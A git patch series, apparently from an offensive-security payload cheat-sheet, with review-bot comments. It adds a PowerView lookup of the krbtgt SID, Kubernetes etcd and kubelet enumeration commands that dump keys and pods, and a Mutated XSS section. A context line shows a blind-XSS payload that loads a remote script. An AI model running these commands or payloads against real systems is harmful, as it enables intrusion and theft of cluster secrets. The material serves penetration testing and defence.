diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index f14954e3..39ef6695 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -151,6 +151,10 @@ Administrator S-1-5-21-297520375-2634728305-5197346142-500 Guest S-1-5-21-297520375-2634728305-5197346142-501 krbtgt S-1-5-21-297520375-2634728305-5197346142-502 lambda S-1-5-21-297520375-2634728305-5197346142-1110 + +# powerview +Convert-NameToSid high-sec-corp.localkrbtgt +S-1-5-21-2941561648-383941485-1389968811-502 ``` ```bash From 6fecedd880b07e647c42c1ce764aba68838ea5dd Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Wed, 6 Nov 2019 18:32:29 +0100 Subject: [PATCH 114/222] MXSS - Mutated XSS - Google POC --- Kubernetes/readme.md | 2 ++ XSS Injection/README.md | 12 ++++++++++++ 2 files changed, 14 insertions(+) diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 841e3d96..8dd34701 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -141,6 +141,7 @@ curl -k https://:(8|6)443/api/v1 ```powershell curl -k https://:2379 curl -k https://:2379/version +etcdctl --endpoints=http://:2379 get / --prefix --keys-only ``` ### Kubelet API @@ -155,6 +156,7 @@ curl -k https://:10250/pods ```powershell curl -k https://:10255 +http://:10255/pods ``` diff --git a/XSS Injection/README.md b/XSS Injection/README.md index f8cac694..337c985b 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -18,6 +18,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [XSS Hunter](#xss-hunter) - [Other Blind XSS tools](#other-blind-xss-tools) - [Blind XSS endpoint](#blind-xss-endpoint) +- [Mutated XSS](#mutated-xss) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [Bypass case sensitive](#bypass-case-sensitive) 
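Review bot: `Convert-NameToSid high-sec-corp.localkrbtgt` is missing the `\` between domain and account (`high-sec-corp.local\krbtgt`); inside a fenced block the backslash needs no escaping, so write it literally. The `# powerview` comment also lands at the bottom of a block of lookup output, so a short line saying it is the PowerView equivalent of the lookup above would make the block read as one example.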
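Review bot: `etcdctl --endpoints=http://:2379 get / --prefix --keys-only` is v3 API syntax; on etcdctl builds that default to the v2 API it fails unless `ETCDCTL_API=3` is exported, so prefix the line with that. It also assumes an etcd reachable over plain HTTP with no client certificate, which is itself the misconfiguration a defender should be checking for, since etcd holds every secret in the cluster.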
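Review bot: `http://:10255/pods` is added as a bare URL to a block of curl commands; write it as `curl http://:10255/pods` for consistency, and note that the read-only kubelet port is plain HTTP, which is why this line is not `https` like the others.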
@@ -422,6 +423,15 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Comment Box - Administrative Panel +## Mutated XSS + +Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`. + +Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/. + +```javascript +
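Review bot: "Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`" should read "Use browser quirks to re-create HTML tags when the payload is assigned to `element.innerHTML`", and the sentence should say which behaviour is meant (the browser serialising and re-parsing the markup differently from the sanitiser), since that is the definition of mutation XSS and what a defender needs to understand why sanitising once before `innerHTML` is not enough. The hunk ends right after the opening ```javascript fence, so the payload it introduces is not in this diff and cannot be reviewed here; make sure the commit includes it, and tag the fence ```html if the payload is markup rather than script.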